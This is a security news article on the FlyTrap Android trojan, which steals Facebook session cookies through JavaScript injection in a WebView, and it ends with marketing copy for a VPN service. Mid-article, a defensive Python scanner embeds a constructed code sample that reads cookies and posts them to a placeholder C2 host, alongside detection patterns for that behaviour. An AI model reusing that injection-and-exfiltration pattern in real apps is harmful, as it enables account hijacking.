FlyTrap Malware Compromises Over 10000 Facebook Accounts


FlyTrap Malware is the name given to a new threat facing Android users with Facebook accounts in more than 140 countries. FlyTrap Malware works by stealing session cookies and using simple social engineering tricks to get its victims’ credentials. This is carried out via malicious apps, in which users are asked to log in with their Facebook credentials. Researchers at mobile security company Zimperium detected the new malware and noted that the stolen information was accessible to anyone who discovered FlyTrap’s command and control (C2) server.

FlyTrap Malware campaigns have been active since at least March. The hackers behind the malicious applications used high-quality design and managed to distribute the apps through the Google Play store, as well as third-party Android stores.

The lure within the apps consists of offers for free coupon codes (for Netflix, Google AdWords) and voting for the favorite soccer team or player, in tune with the delayed UEFA Euro 2020 competition.

In order to get the reward, the user must log in to the app using Facebook credentials, and the authentication occurs on the legitimate social media domain.

Some of the malicious apps FlyTrap Malware relies on. Source: Zimperium

Due to the apps using the real Facebook single sign-on (SSO) service, they can’t collect users’ credentials. However, FlyTrap Malware uses a JavaScript injection to gather other sensitive information.

“Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code.”

The information is fed into the hackers’ C2 server. Over 10,000 Android users in more than 140 countries have fallen for the ploy.

Countries affected by FlyTrap Malware. Source: Zimperium

Researchers found the numbers by looking through FlyTrap Malware’s C2 server. The server is not secured, and the stolen Facebook session cookies are open to anyone on the Internet who knows where to look.

Zimperium’s Aazim Yaswant says in a blog post today that FlyTrap Malware’s C2 server had multiple security vulnerabilities that facilitated access to the stored information.

The researcher notes that accounts on social media platforms are a common target for threat actors, who can use them for fraudulent purposes like artificially boosting the popularity of pages, sites, products, misinformation, or a political message.

He highlights the fact that phishing pages that steal credentials are not the only way to log into the account of an online service. Logging onto the legitimate domain can also come with risks.

“Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Malware is hijacking the session information for malicious intent,” said Aazim Yaswant, Android malware researcher, Zimperium.

FlyTrap Malware Analysis

Note: This analysis is from the Zimperium Report.

Contrary to popular belief that a phishing page is always at the forefront for compromising or hijacking an account, there are ways to hijack sessions even by logging into the original and legit domain. This Trojan exploits one such technique known as JavaScript injection.

Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code.
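The report describes a specific combination of behaviours: a WebView with JavaScript enabled, script injection, cookie access, and a legitimate third-party login URL. The following added example (not Zimperium's or FlyTrap's code) is a triage heuristic an analyst could run over decompiled app source to flag that combination; the source excerpt is constructed, and the C2 host, `appId` and `post()` helper are placeholders.

```python
import re

# Constructed excerpt of decompiled Android source, standing in for a decompiled
# APK. Assumption: the app follows the WebView pattern the report describes.
SAMPLE_SOURCE = """
WebView wv = findViewById(R.id.login_view);
wv.getSettings().setJavaScriptEnabled(true);
wv.setWebViewClient(new WebViewClient() {
    public void onPageFinished(WebView view, String url) {
        String ck = CookieManager.getInstance().getCookie(url);
        view.evaluateJavascript("(function(){return document.cookie;})()", null);
        post("https://c2.example.invalid/collect?from_app=" + appId, ck);
    }
});
wv.loadUrl("https://m.facebook.com/login");
"""

# Each indicator is harmless on its own; the combination is what matters.
INDICATORS = {
    "js_enabled": r"setJavaScriptEnabled\(\s*true\s*\)",
    "js_injection": r"evaluateJavascript\(|loadUrl\(\s*\"javascript:",
    "cookie_read": r"CookieManager|document\.cookie",
    "third_party_login": r"https?://[\w.-]*facebook\.com/",
    "exfil_marker": r"from_app=",   # parameter the report says tags the source app
}

def scan_source(src: str) -> dict:
    """Return which indicators fire in a decompiled source excerpt."""
    return {name: bool(re.search(pat, src)) for name, pat in INDICATORS.items()}

def risk_level(hits: dict) -> str:
    """Rate the excerpt: all four core indicators together is the report's pattern."""
    core = ("js_enabled", "js_injection", "cookie_read", "third_party_login")
    n = sum(hits[k] for k in core)
    if n == len(core):
        return "high"    # JS-enabled WebView + injection + cookie access + SSO domain
    if n >= 2:
        return "medium"
    return "low"

if __name__ == "__main__":
    hits = scan_source(SAMPLE_SOURCE)
    print(hits, risk_level(hits))
```

A legitimate app that merely enables JavaScript and loads its own site scores "low", so the heuristic is meant to prioritise manual review rather than to replace it.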

The manipulation of web resources is addressed as cross-principal manipulation (XPM) in the research “An Empirical Study Of Web Resource Manipulation In Real-world Mobile Applications.” Successful login into Facebook by the victim initiates the data exfiltration process and can be seen in the below screenshots of the communication with the C&C server.

Several of the Trojans have the same malicious script and therefore identify the source of data by the parameter “from_app” as seen in the screenshots below.

The Command & Control server makes use of login credentials for authorizing access to the harvested data. Security vulnerabilities in the C&C server expose the entire database of stolen session cookies to anyone on the internet, further increasing the threat to the victim’s social credibility.

Malicious threat actors are leveraging common user misconceptions that logging into the right domain is always secure irrespective of the application used to log in. The targeted domains are popular social media platforms and this campaign has been exceptionally effective in harvesting social media session data of users from 144 countries. These accounts can be used as a botnet for different purposes: from boosting the popularity of pages/sites/products to spreading misinformation or political propaganda.

Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Malware is hijacking the session information for malicious intent.

FlyTrap Malware is just one example of the ongoing, active threats against mobile devices aimed at stealing credentials. Mobile endpoints are often treasure troves of unprotected login information to social media accounts, banking applications, enterprise tools, and more. The tools and techniques used by FlyTrap are not novel but are effective due to the lack of advanced mobile endpoint security on these devices. It would not take much for a malicious party to take FlyTrap or any other Trojan and modify it to target even more critical information.

Protection

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always-on, military-grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees’ or family members’ devices, including activity, time spent online, and threats blocked.
